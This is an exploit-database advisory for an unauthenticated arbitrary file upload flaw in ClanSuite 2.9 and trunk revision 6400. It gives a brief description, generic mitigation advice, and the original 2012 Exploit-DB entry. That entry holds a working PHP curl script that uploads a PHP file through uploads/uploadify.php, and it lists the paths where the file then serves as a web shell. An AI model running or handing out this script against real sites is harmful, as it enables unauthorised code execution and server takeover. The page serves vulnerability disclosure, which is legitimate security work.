ClanSuite 2.9 Arbitrary File Upload

vendor:

ClanSuite

by:

Adrien Thierry

8,8

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: ClanSuite

Affected Version From: 2.9

Affected Version To: Trunk Revision 6400

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

ClanSuite 2.9 Arbitrary File Upload

ClanSuite is vulnerable to an arbitrary file upload vulnerability. This vulnerability allows an attacker to upload a malicious file to the server, which can then be used to gain access to the server. The vulnerability exists in the uploads/uploadify.php page, which allows an attacker to upload a file without any authentication. An attacker can use the curl command to upload a malicious file to the server, which can then be used to gain access to the server. The malicious file can be accessed at http://mysite.com/uploads/temps/info.php or http://mysite.com/application/uploads/temps/info.php

Mitigation:

The best way to mitigate this vulnerability is to ensure that all file uploads are properly authenticated and validated. Additionally, it is recommended to use a web application firewall to detect and block malicious requests.

Source

Exploit-DB raw data:

###########################################################
#
# Exploit Title: ClanSuite 2.9 Arbitrary File Upload
# Date: 29/05/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://clansuite.com/
# Software Link : https://github.com/jakoch/Clansuite
# or			: http://svn.gna.org/svn/clansuite/trunk/
# Version: 2.9 and Trunk Revision 6400
#
###########################################################

Vuln page : uploads/uploadify.php

exploit :

<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
$c = curl_init("http://mysite.com/uploads/uploadify.php"); // Version 2.9
$c = curl_init("http://mysite.com/application/uploads/uploadify.php"); // Version trunk
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$u",
'name'=>"info.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>

shell access : http://mysite.com/uploads/temps/info.php      
or 			 : http://mysite.com/application/uploads/temps/info.php

#####################################################################